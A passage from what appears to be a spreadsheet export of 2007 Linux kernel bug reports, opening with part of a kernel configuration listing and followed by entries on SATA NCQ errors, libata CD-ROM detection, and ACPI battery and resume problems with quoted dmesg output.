unified userspace &lt;-&gt; kernelspace linker # # CONFIG_CONNECTOR is not set # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_SERIAL=m CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_SUPERIO=y CONFIG_PARPORT_PC_PCMCIA=m # CONFIG_PARPORT_GSC is not set CONFIG_PARPORT_AX88796=m CONFIG_PARPORT_1284=y CONFIG_PARPORT_NOT_PC=y # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y # # Block devices # CONFIG_BLK_DEV_FD=m CONFIG_PARIDE=m # # Parallel IDE high-level drivers # CONFIG_PARIDE_PD=m CONFIG_PARIDE_PCD=m CONFIG_PARIDE_PF=m CONFIG_PARIDE_PT=m CONFIG_PARIDE_PG=m # # Parallel IDE protocol modules # CONFIG_PARIDE_ATEN=m # CONFIG_PARIDE_BPCK is not set # CONFIG_PARIDE_BPCK6 is not set # CONFIG_PARIDE_COMM is not set # CONFIG_PARIDE_DSTR is not set # CONFIG_PARIDE_FIT2 is not set # CONFIG_PARIDE_FIT3 is not set # CONFIG_PARIDE_EPAT is not set # CONFIG_PARIDE_EPIA is not set # CONFIG_PARIDE_FRIQ is not set # CONFIG_PARIDE_FRPW is not set # CONFIG_PARIDE_KBIC is not set # CONFIG_PARIDE_KTTI is not set # CONFIG_PARIDE_ON20 is not set # CONFIG_PARIDE_ON26 is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set CONFIG_BLK_DEV_DAC960=m # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_SX8=m CONFIG_BLK_DEV_UB=m CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_COUNT=16 CONFIG_BLK_DEV_RAM_SIZE=65536 CONFIG_BLK_DEV_RAM_BLOCKSIZE=1024 CONFIG_CDROM_PKTCDVD=m CONFIG_CDROM_PKTCDVD_BUFFERS=8 # CONFIG_CDROM_PKTCDVD_WCACHE is not set CONFIG_ATA_OVER_ETH=m # # Misc devices # # CONFIG_IBM_ASM is not set # CONFIG_PHANTOM is not set # CONFIG_SGI_IOC4 is not set CONFIG_TIFM_CORE=m CONFIG_TIFM_7XX1=m # CONFIG_ASUS_LAPTOP is not set # CONFIG_MSI_LAPTOP is not set CONFIG_SONY_LAPTOP=y CONFIG_SONYPI_COMPAT=y # CONFIG_THINKPAD_ACPI is not set CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=m # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECS=m CONFIG_BLK_DEV_DELKIN=m CONFIG_BLK_DEV_IDECD=m CONFIG_BLK_DEV_IDETAPE=m CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=m CONFIG_BLK_DEV_IDEACPI=y # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_PROC_FS=y # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPNP=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=m # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_BLK_DEV_TC86C001 is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set # CONFIG_BLK_DEV_HD is not set # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=m CONFIG_SCSI_TGT=m CONFIG_SCSI_NETLINK=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m CONFIG_CHR_DEV_ST=m CONFIG_CHR_DEV_OSST=m CONFIG_BLK_DEV_SR=m CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=m CONFIG_CHR_DEV_SCH=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y CONFIG_SCSI_LOGGING=y CONFIG_SCSI_SCAN_ASYNC=y CONFIG_SCSI_WAIT_SCAN=m # # SCSI Transports # CONFIG_SCSI_SPI_ATTRS=m CONFIG_SCSI_FC_ATTRS=m CONFIG_SCSI_ISCSI_ATTRS=m CONFIG_SCSI_SAS_ATTRS=m CONFIG_SCSI_SAS_LIBSAS=m # CONFIG_SCSI_SAS_LIBSAS_DEBUG is not set # # SCSI low-level drivers # CONFIG_ISCSI_TCP=m # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_SCSI_AIC94XX is not set # CONFIG_SCSI_DPT_I2O is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_ARCMSR is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_MEGARAID_SAS is not set # CONFIG_SCSI_HPTIOP is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set CONFIG_SCSI_EATA=m # CONFIG_SCSI_EATA_TAGGED_QUEUE is not set # CONFIG_SCSI_EATA_LINKED_COMMANDS is not set CONFIG_SCSI_EATA_MAX_TAGS=16 # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set CONFIG_SCSI_PPA=m CONFIG_SCSI_IMM=m CONFIG_SCSI_IZIP_EPP16=y # CONFIG_SCSI_IZIP_SLOW_CTR is not set # CONFIG_SCSI_STEX is not set # CONFIG_SCSI_SYM53C8XX_2 is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_QLA_FC is not set # CONFIG_SCSI_QLA_ISCSI is not set # CONFIG_SCSI_LPFC is not set # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_NSP32 is not set # CONFIG_SCSI_DEBUG is not set # CONFIG_SCSI_SRP is not set # # PCMCIA SCSI adapter support # CONFIG_PCMCIA_AHA152X=m CONFIG_PCMCIA_FDOMAIN=m CONFIG_PCMCIA_NINJA_SCSI=m CONFIG_PCMCIA_QLOGIC=m CONFIG_PCMCIA_SYM53C500=m # CONFIG_ATA is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # CONFIG_FUSION_SPI is not set # CONFIG_FUSION_FC is not set # CONFIG_FUSION_SAS is not set # # IEEE 1394 (FireWire) support # CONFIG_FIREWIRE=m CONFIG_FIREWIRE_OHCI=m CONFIG_FIREWIRE_SBP2=m CONFIG_IEEE1394=m # # Subsystem Options # # CONFIG_IEEE1394_VERBOSEDEBUG is not set # # Controllers # CONFIG_IEEE1394_PCILYNX=m CONFIG_IEEE1394_OHCI1394=m # # Protocols # CONFIG_IEEE1394_VIDEO1394=m CONFIG_IEEE1394_SBP2=m CONFIG_IEEE1394_SBP2_PHYS_DMA=y CONFIG_IEEE1394_ETH1394_ROM_ENTRY=y CONFIG_IEEE1394_ETH1394=m CONFIG_IEEE1394_DV1394=m CONFIG_IEEE1394_RAWIO=m # # I2O device support # CONFIG_I2O=m CONFIG_I2O_LCT_NOTIFY_ON_CHANGES=y CONFIG_I2O_EXT_ADAPTEC=y CONFIG_I2O_CONFIG=m CONFIG_I2O_CONFIG_OLD_IOCTL=y CONFIG_I2O_BUS=m CONFIG_I2O_BLOCK=m CONFIG_I2O_SCSI=m CONFIG_I2O_PROC=m # CONFIG_MACINTOSH_DRIVERS is not set # # Network device support # CONFIG_NETDEVICES=y CONFIG_DUMMY=m CONFIG_BONDING=m CONFIG_EQUALIZER=m CONFIG_TUN=m # CONFIG_NET_SB1000 is not set # CONFIG_ARCNET is not set CONFIG_PHYLIB=m # # MII PHY device drivers # CONFIG_MARVELL_PHY=m CONFIG_DAVICOM_PHY=m CONFIG_QSEMI_PHY=m CONFIG_LXT_PHY=m CONFIG_CICADA_PHY=m CONFIG_VITESSE_PHY=m CONFIG_SMSC_PHY=m CONFIG_BROADCOM_PHY=m CONFIG_FIXED_PHY=m # CONFIG_FIXED_MII_10_FDX is not set # CONFIG_FIXED_MII_100_FDX is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=m # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_CASSINI is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_NET_PCI is not set CONFIG_NET_POCKET=y CONFIG_ATP=m CONFIG_DE600=m CONFIG_DE620=m # CONFIG_NETDEV_1000 is not set # CONFIG_NETDEV_10000 is not set # CONFIG_TR is not set # # Wireless LAN # # CONFIG_WLAN_PRE80211 is not set CONFIG_WLAN_80211=y # CONFIG_PCMCIA_RAYCS is not set # CONFIG_IPW2100 is not set # CONFIG_IPW2200 is not set # CONFIG_LIBERTAS is not set # CONFIG_AIRO is not set CONFIG_HERMES=m CONFIG_PLX_HERMES=m CONFIG_TMD_HERMES=m CONFIG_NORTEL_HERMES=m CONFIG_PCI_HERMES=m CONFIG_ATMEL=m # CONFIG_PCI_ATMEL is not set CONFIG_PCMCIA_HERMES=m CONFIG_PCMCIA_SPECTRUM=m CONFIG_AIRO_CS=m CONFIG_PCMCIA_ATMEL=m CONFIG_PCMCIA_WL3501=m CONFIG_PRISM54=m CONFIG_USB_ZD1201=m CONFIG_HOSTAP=m CONFIG_HOSTAP_FIRMWARE=y CONFIG_HOSTAP_FIRMWARE_NVRAM=y CONFIG_HOSTAP_PLX=m CONFIG_HOSTAP_PCI=m CONFIG_HOSTAP_CS=m CONFIG_BCM43XX=m CONFIG_BCM43XX_DEBUG=y CONFIG_BCM43XX_DMA=y CONFIG_BCM43XX_PIO=y CONFIG_BCM43XX_DMA_AND_PIO_MODE=y # CONFIG_BCM43XX_DMA_MODE is not set # CONFIG_BCM43XX_PIO_MODE is not set CONFIG_ZD1211RW=m # CONFIG_ZD1211RW_DEBUG is not set # # USB Network Adapters # CONFIG_USB_CATC=m CONFIG_USB_KAWETH=m CONFIG_USB_PEGASUS=m CONFIG_USB_RTL8150=m CONFIG_USB_USBNET_MII=m CONFIG_USB_USBNET=m CONFIG_USB_NET_AX8817X=m CONFIG_USB_NET_CDCETHER=m CONFIG_USB_NET_DM9601=m CONFIG_USB_NET_GL620A=m CONFIG_USB_NET_NET1080=m CONFIG_USB_NET_PLUSB=m CONFIG_USB_NET_MCS7830=m CONFIG_USB_NET_RNDIS_HOST=m CONFIG_USB_NET_CDC_SUBSET=m CONFIG_USB_ALI_M5632=y CONFIG_USB_AN2720=y CONFIG_USB_BELKIN=y CONFIG_USB_ARMLINUX=y CONFIG_USB_EPSON2888=y CONFIG_USB_KC2190=y CONFIG_USB_NET_ZAURUS=m CONFIG_NET_PCMCIA=y CONFIG_PCMCIA_3C589=m CONFIG_PCMCIA_3C574=m CONFIG_PCMCIA_FMVJ18X=m CONFIG_PCMCIA_PCNET=m CONFIG_PCMCIA_NMCLAN=m CONFIG_PCMCIA_SMC91C92=m CONFIG_PCMCIA_XIRC2PS=m CONFIG_PCMCIA_AXNET=m CONFIG_WAN=y CONFIG_LANMEDIA=m CONFIG_HDLC=m CONFIG_HDLC_RAW=m CONFIG_HDLC_RAW_ETH=m CONFIG_HDLC_CISCO=m CONFIG_HDLC_FR=m CONFIG_HDLC_PPP=m # # X.25/LAPB support is disabled # CONFIG_PCI200SYN=m CONFIG_WANXL=m # CONFIG_WANXL_BUILD_FIRMWARE is not set CONFIG_PC300=m CONFIG_PC300_MLPPP=y # # Cyclades-PC300 MLPPP support is disabled. # # # Refer to the file README.mlppp, provided by PC300 package. # # CONFIG_PC300TOO is not set CONFIG_FARSYNC=m CONFIG_DSCC4=m CONFIG_DSCC4_PCISYNC=y CONFIG_DSCC4_PCI_RST=y CONFIG_DLCI=m CONFIG_DLCI_MAX=8 CONFIG_SBNI=m # CONFIG_SBNI_MULTILINE is not set CONFIG_FDDI=y CONFIG_DEFXX=m # CONFIG_DEFXX_MMIO is not set CONFIG_SKFP=m CONFIG_HIPPI=y CONFIG_ROADRUNNER=m # CONFIG_ROADRUNNER_LARGE_RINGS is not set CONFIG_PLIP=m CONFIG_PPP=m CONFIG_PPP_MULTILINK=y CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPP_MPPE=m CONFIG_PPPOE=m CONFIG_SLIP=m CONFIG_SLIP_COMPRESSED=y CONFIG_SLHC=m CONFIG_SLIP_SMART=y CONFIG_SLIP_MODE_SLIP6=y CONFIG_NET_FC=y CONFIG_SHAPER=m CONFIG_NETCONSOLE=m CONFIG_NETPOLL=y # CONFIG_NETPOLL_TRAP is not set CONFIG_NET_POLL_CONTROLLER=y # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # CONFIG_INPUT_FF_MEMLESS is not set # CONFIG_INPUT_POLLDEV is not set # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=480 CONFIG_INPUT_JOYDEV=m # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_KEYBOARD_STOWAWAY is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y # CONFIG_MOUSE_PS2_TOUCHKIT is not set CONFIG_MOUSE_SERIAL=m # CONFIG_MOUSE_APPLETOUCH is not set CONFIG_MOUSE_VSXXXAA=m CONFIG_INPUT_JOYSTICK=y # CONFIG_JOYSTICK_ANALOG is not set # CONFIG_JOYSTICK_A3D is not set # CONFIG_JOYSTICK_ADI is not set # CONFIG_JOYSTICK_COBRA is not set # CONFIG_JOYSTICK_GF2K is not set # CONFIG_JOYSTICK_GRIP is not set # CONFIG_JOYSTICK_GRIP_MP is not set # CONFIG_JOYSTICK_GUILLEMOT is not set # CONFIG_JOYSTICK_INTERACT is not set # CONFIG_JOYSTICK_SIDEWINDER is not set # CONFIG_JOYSTICK_TMDC is not set # CONFIG_JOYSTICK_IFORCE is not set CONFIG_JOYSTICK_WARRIOR=m CONFIG_JOYSTICK_MAGELLAN=m CONFIG_JOYSTICK_SPACEORB=m CONFIG_JOYSTICK_SPACEBALL=m CONFIG_JOYSTICK_STINGER=m CONFIG_JOYSTICK_TWIDJOY=m CONFIG_JOYSTICK_DB9=m CONFIG_JOYSTICK_GAMECON=m CONFIG_JOYSTICK_TURBOGRAFX=m # CONFIG_JOYSTICK_JOYDUMP is not set # CONFIG_JOYSTICK_XPAD is not set # CONFIG_INPUT_TABLET is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=m CONFIG_INPUT_WISTRON_BTNS=m # CONFIG_INPUT_ATLAS_BTNS is not set # CONFIG_INPUT_ATI_REMOTE is not set # CONFIG_INPUT_ATI_REMOTE2 is not set # CONFIG_INPUT_KEYSPAN_REMOTE is not set # CONFIG_INPUT_POWERMATE is not set # CONFIG_INPUT_YEALINK is not set CONFIG_INPUT_UINPUT=m # # Hardware I/O ports # CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=m CONFIG_SERIO_CT82C710=m CONFIG_SERIO_PARKBD=m CONFIG_SERIO_PCIPS2=m CONFIG_SERIO_LIBPS2=y CONFIG_SERIO_RAW=m # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_VT_HW_CONSOLE_BINDING=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_8250_PCI=y CONFIG_SERIAL_8250_PNP=y CONFIG_SERIAL_8250_CS=m CONFIG_SERIAL_8250_NR_UARTS=48 CONFIG_SERIAL_8250_RUNTIME_UARTS=4 CONFIG_SERIAL_8250_EXTENDED=y CONFIG_SERIAL_8250_MANY_PORTS=y CONFIG_SERIAL_8250_SHARE_IRQ=y # CONFIG_SERIAL_8250_DETECT_IRQ is not set CONFIG_SERIAL_8250_RSA=y # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_SERIAL_JSM=m CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m CONFIG_TIPAR=m # # IPMI # # CONFIG_IPMI_HANDLER is not set # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=y CONFIG_HW_RANDOM_INTEL=m CONFIG_HW_RANDOM_AMD=m CONFIG_HW_RANDOM_GEODE=m CONFIG_HW_RANDOM_VIA=m CONFIG_NVRAM=m CONFIG_RTC=y # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set CONFIG_SONYPI=m CONFIG_AGP=m CONFIG_AGP_ALI=m CONFIG_AGP_ATI=m CONFIG_AGP_AMD=m CONFIG_AGP_AMD64=m CONFIG_AGP_INTEL=m CONFIG_AGP_NVIDIA=m CONFIG_AGP_SIS=m CONFIG_AGP_SWORKS=m CONFIG_AGP_VIA=m CONFIG_AGP_EFFICEON=m CONFIG_DRM=m # CONFIG_DRM_TDFX is not set CONFIG_DRM_R128=m CONFIG_DRM_RADEON=m # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_I915 is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_DRM_VIA is not set # CONFIG_DRM_SAVAGE is not set # # PCMCIA character devices # CONFIG_SYNCLINK_CS=m CONFIG_CARDMAN_4000=m CONFIG_CARDMAN_4040=m # CONFIG_MWAVE is not set CONFIG_PC8736x_GPIO=m CONFIG_NSC_GPIO=m # CONFIG_CS5535_GPIO is not set # CONFIG_RAW_DRIVER is not set CONFIG_HPET=y # CONFIG_HPET_RTC_IRQ is not set CONFIG_HPET_MMAP=y CONFIG_HANGCHECK_TIMER=m # # TPM devices # # CONFIG_TCG_TPM is not set # CONFIG_TELCLOCK is not set CONFIG_DEVPORT=y CONFIG_I2C=y CONFIG_I2C_BOARDINFO=y CONFIG_I2C_CHARDEV=y # # I2C Algorithms # CONFIG_I2C_ALGOBIT=m CONFIG_I2C_ALGOPCF=m CONFIG_I2C_ALGOPCA=m # # I2C Hardware Bus support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_I810 is not set CONFIG_I2C_PIIX4=y # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_OCORES is not set CONFIG_I2C_PARPORT=m CONFIG_I2C_PARPORT_LIGHT=m # CONFIG_I2C_PROSAVAGE is not set # CONFIG_I2C_SAVAGE4 is not set # CONFIG_I2C_SIMTEC is not set # CONFIG_SCx200_ACB is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630</t>
  </si>
  <si>
    <t>spurious completions during NCQ - Samsung Harddisk</t>
  </si>
  <si>
    <t>2007-07-24 19:59 UTC</t>
  </si>
  <si>
    <t>2007-07-28 00:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu 7.04 (Feisty) Hardware Environment: Asrock ALiveNF7G-HDready mainboard, SAMSUNG HD401LJ harddisk Software Environment: Linux x86_64 SMP Problem Description: Hi, I'm using the recently bought mainboard described above with an AMD64 dual-core CPU. Some time (~15 min) after system boot-up, I get the following errors in dmesg: ata1.00: exception Emask 0x2 SAct 0x7e03 SErr 0x0 action 0x2 frozen ata1.00: (spurious completions during NCQ issue=0x0 SAct=0x7e03 FIS=004040a1:00000100) ata1.00: cmd 61/08:00:67:03:a8/00:00:02:00:00/40 tag 0 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/08:08:27:05:ac/00:00:02:00:00/40 tag 1 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/10:48:07:03:a4/00:00:02:00:00/40 tag 9 cdb 0x0 data 8192 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/10:50:f7:03:a4/00:00:02:00:00/40 tag 10 cdb 0x0 data 8192 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/08:58:7f:00:a8/00:00:02:00:00/40 tag 11 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/08:60:c7:00:ac/00:00:02:00:00/40 tag 12 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/08:68:9f:01:ac/00:00:02:00:00/40 tag 13 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1.00: cmd 61/08:70:37:03:a8/00:00:02:00:00/40 tag 14 cdb 0x0 data 4096 out res 40/00:0c:27:05:ac/00:00:02:00:00/40 Emask 0x2 (HSM violation) ata1: soft resetting port ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1.00: configured for UDMA/133 ata1: EH complete sd 0:0:0:0: [sda] 781422768 512-byte hardware sectors (400088 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA The complete output of dmesg (and lspci, if it helps) is available here: http://datenparkplatz.de/DiesUndDas/dmesg.output.txt http://datenparkplatz.de/DiesUndDas/lspci.output.txt Steps to reproduce: just using the system (harddisk read/write access). If you need further information about my system, please send me an e-mail.</t>
  </si>
  <si>
    <t>libata detects no cdrom drive</t>
  </si>
  <si>
    <t>&gt;= 2.6.22</t>
  </si>
  <si>
    <t>2007-07-25 10:02 UTC</t>
  </si>
  <si>
    <t>Hauke</t>
  </si>
  <si>
    <t>2007-08-06 10:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21 Distribution: archlinux Hardware Environment: notebook with intel ICH8 chip, sata hdd, cdrom Software Environment: Problem Description: I use a custom kernel version 2.6.22.1 my harddrive is working well. it is a sata drive. The IDE interface is an Intel ICH8-Controller: 00:1f.2 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA IDE Controller (rev 03) dmesg: ata_piix 0000:00:1f.2: version 2.11 ata_piix 0000:00:1f.2: MAP [ IDE IDE -- -- ] scsi0 : ata_piix scsi1 : ata_piix ata1: PATA max UDMA/100 cmd 0x00000000000101f0 ctl 0x00000000000103f6 bmdma 0x000000000001ffa0 irq 14 ata2: SATA max UDMA/133 cmd 0x0000000000010170 ctl 0x0000000000010376 bmdma 0x000000000001ffa8 irq 15 ata1.00: ATA-7: Hitachi HTS541612J9SA00, SBDOC70P, max UDMA/100 ata1.00: 234441648 sectors, multi 16: LBA48 NCQ (depth 0/32) ata1.00: configured for UDMA/100 scsi 0:0:0:0: Direct-Access ATA Hitachi HTS54161 SBDO PQ: 0 ANSI: 5 sd 0:0:0:0: [sda] 234441648 512-byte hardware sectors (120034 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sd 0:0:0:0: [sda] 234441648 512-byte hardware sectors (120034 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 &lt; sda5 sda6 sda7 &gt; sda4 sd 0:0:0:0: [sda] Attached SCSI disk sd 0:0:0:0: Attached scsi generic sg0 type 0 all right! now it seems that my cdrom is not a sata device. so it it an atapi, right? if I load the ide-cd module (incl. ide-generic etc) (I have to comile it as module - otherwise ---&gt; kernel panic) dmesg said: Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ide0: I/O resource 0x3F6-0x3F6 not free. ide0: ports already in use, skipping probe ide1: I/O resource 0x376-0x376 not free. ide1: ports already in use, skipping probe so the sata driver blocks the interface. with kernel (kernel.org) version 2.6.21 it was possible to load libata together with atapi support for cdrom. without atapi support no cdrom will detected. cdrom-device: HL-DT-ST DVDRAM GSA-T20N, ATAPI CD/DVD-ROM drive same with kernel (kernel.org) 2.6.23-rc1 sorry for my english</t>
  </si>
  <si>
    <t>Laptop needs acpi_serialize to works - HP Pavillion dv8230us</t>
  </si>
  <si>
    <t>2007-07-25 10:41 UTC</t>
  </si>
  <si>
    <t>salatiel.filho</t>
  </si>
  <si>
    <t>2008-06-13 21:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.5 Distribution: Ubuntu/Slackware Hardware Environment: HP Pavillion dv8230us Software Environment: Problem Description: With out acpi_serialize option , my machine does not function properly. A lot of battery problems with: rror (dswload-0774): [PBST] Namespace lookup failure, AE_ALREADY_EXISTS ACPI Exception (psloop-0225): AE_ALREADY_EXISTS, During name lookup/catalog [20070126] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.BAT1._BST] (Node dfd1b770), AE_ALREADY_EXISTS ACPI: Marking method _BST as Serialized ACPI Exception (battery-0206): AE_ALREADY_EXISTS, Evaluating _BST [20070126] ACPI Error (psargs-0355): [PBST] Namespace lookup failure, AE_NOT_FOUND ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.BAT1._BST] (Node dfd1b770), AE_NOT_FOUND ACPI Exception (battery-0206): AE_NOT_FOUND, Evaluating _BST [20070126]</t>
  </si>
  <si>
    <t>acpi does not rescan button event on resume, leading to userspace confusion</t>
  </si>
  <si>
    <t>2.6.23rc1</t>
  </si>
  <si>
    <t>2007-07-26 05:10 UTC</t>
  </si>
  <si>
    <t>Richard Hughes</t>
  </si>
  <si>
